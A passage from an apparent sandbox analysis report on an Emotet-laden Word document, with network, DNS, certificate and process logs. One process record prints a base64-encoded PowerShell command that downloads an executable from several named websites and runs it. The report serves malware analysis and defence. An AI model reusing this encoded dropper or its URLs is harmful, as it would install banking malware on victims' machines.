Sep 20, 2019 13:30:09.216612101 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216624975 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216644049 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216662884 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216680050 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216698885 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216716051 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216733932 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216762066 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216779947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216799021 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216816902 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.222572088 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.222759962 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.223519087 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.323061943 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323107004 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323168993 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323267937 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323271990 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.323402882 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323489904 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323515892 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.323590040 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323682070 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.323682070 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.325934887 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.326009035 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.326276064 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.326363087 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.326630116 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.326782942 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.326916933 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.326998949 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.327080965 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.327156067 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.327514887 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.329025984 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329108000 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329210997 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329289913 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.329354048 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329428911 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329509974 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329535961 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.329652071 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329745054 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.329807997 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.330962896 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.331078053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331166983 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331248999 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.331260920 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331361055 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331461906 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331489086 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.331566095 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.331659079 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.332880974 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.336910009 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.337017059 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.337235928 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.342113018 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.342195034 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.342343092 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.348118067 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.348160982 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.348277092 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.348475933 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.348786116 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.348843098 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.348939896 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349010944 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.349036932 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349144936 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349206924 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.349245071 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349351883 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349442005 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349450111 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.349560976 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349652052 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349690914 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.349759102 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349839926 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.349864960 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.349968910 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350076914 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.350079060 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350167990 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350239992 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.350312948 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350356102 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350487947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.350519896 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.351738930 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.448889971 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.448951006 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.448971987 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449060917 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449160099 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449188948 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.449374914 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449449062 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449491024 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449568987 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449593067 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.449665070 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449779987 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449807882 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.449873924 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.449947119 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.449981928 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.451287985 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.451349974 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.451569080 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.451934099 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.452960968 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453033924 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453130960 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453145027 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.453248978 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453346968 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.453356981 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453457117 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.453507900 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.454662085 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.454754114 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.454857111 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.456470013 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.456562996 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.456619978 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.456713915 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.456794024 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.456906080 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.456908941 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.456991911 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.457139015 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.457869053 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.458340883 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458415985 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458522081 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458549023 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.458657026 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458738089 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458838940 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.458843946 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.460325956 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.462601900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.462646008 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.462735891 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.462764978 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.462862968 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.462963104 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.463006020 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.463114023 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.463176966 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.463253975 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.467879057 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.467938900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.468067884 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.474091053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474165916 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474251986 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474284887 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.474421024 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474550009 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.474596024 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474684000 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474817991 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.474827051 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.474927902 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.475028992 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.475050926 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.475178003 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.475286007 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.475363970 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.475471973 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.475621939 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.477231979 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477247000 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.477277994 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477396965 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.477420092 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477490902 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477554083 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.477567911 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477663040 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477770090 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.477786064 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477885962 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477984905 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.477993965 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.480212927 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.575073957 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575108051 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575171947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575288057 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575342894 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.575494051 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575546980 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575570107 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.575680971 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:10.276510000 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:40.355288982 CEST	49164	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:30:43.363837004 CEST	49164	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:30:49.363673925 CEST	49164	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:31:01.533160925 CEST	49165	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:31:04.535896063 CEST	49165	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:31:10.535446882 CEST	49165	990	192.168.1.16	149.167.86.174
Sep 20, 2019 13:31:28.352250099 CEST	49166	80	192.168.1.16	181.164.8.25
Sep 20, 2019 13:31:31.348680019 CEST	49166	80	192.168.1.16	181.164.8.25
Sep 20, 2019 13:31:37.364033937 CEST	49166	80	192.168.1.16	181.164.8.25
Sep 20, 2019 13:31:49.366425991 CEST	49167	80	192.168.1.16	181.164.8.25
Sep 20, 2019 13:31:52.363720894 CEST	49167	80	192.168.1.16	181.164.8.25
Sep 20, 2019 13:31:58.364341974 CEST	49167	80	192.168.1.16	181.164.8.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2019 13:30:07.499588966 CEST	53666	53	192.168.1.16	8.8.8.8
Sep 20, 2019 13:30:07.538263083 CEST	53	53666	8.8.8.8	192.168.1.16

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 20, 2019 13:31:38.471829891 CEST	181.164.8.25	192.168.1.16	7c97	(Host unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 20, 2019 13:30:07.499588966 CEST	192.168.1.16	8.8.8.8	0x9ed2	Standard query (0)	sabiosdelamor.co	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 20, 2019 13:30:07.538263083 CEST	8.8.8.8	192.168.1.16	0x9ed2	No error (0)	sabiosdelamor.co		198.49.65.242	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 20, 2019 13:30:07.831115007 CEST	198.49.65.242	443	192.168.1.16	49163	CN=sabiosdelamor.co CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue Sep 17 02:00:00 CEST 2019 Mon May 18 02:00:00 CEST 2015 Tue May 30 12:48:38 CEST 2000	Tue Dec 17 00:59:59 CET 2019 Sun May 18 01:59:59 CEST 2025 Sat May 30 12:48:38 CEST 2020	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3204 Parent PID: 532

General

Start time:	13:29:24
Start date:	20/09/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2f3e0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 3456 Parent PID: 1720

General

Start time:	13:29:41
Start date:	20/09/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA
Imagebase:	0x21ae0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: 982.exe PID: 3644 Parent PID: 3456

General

Start time:	13:29:48
Start date:	20/09/2019
Path:	C:\Users\user\982.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\982.exe'
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 16%, Virustotal, Browse
Reputation:	low

Chronological Activities

Analysis Process: 982.exe PID: 3668 Parent PID: 3644

General

Start time:	13:29:48
Start date:	20/09/2019
Path:	C:\Users\user\982.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\982.exe'
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 982.exe PID: 3696 Parent PID: 3668

General

Start time:	13:29:50
Start date:	20/09/2019
Path:	C:\Users\user\982.exe
Wow64 process (32bit):	false
Commandline:	--4e722ada
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 982.exe PID: 3600 Parent PID: 3696

General

Start time:	13:29:51
Start date:	20/09/2019
Path:	C:\Users\user\982.exe
Wow64 process (32bit):	false
Commandline:	--4e722ada
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: mscorsvw.exe PID: 3528 Parent PID: 416

General

Start time:	13:29:53
Start date:	20/09/2019
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Imagebase:	0x1e0000
File size:	107192 bytes
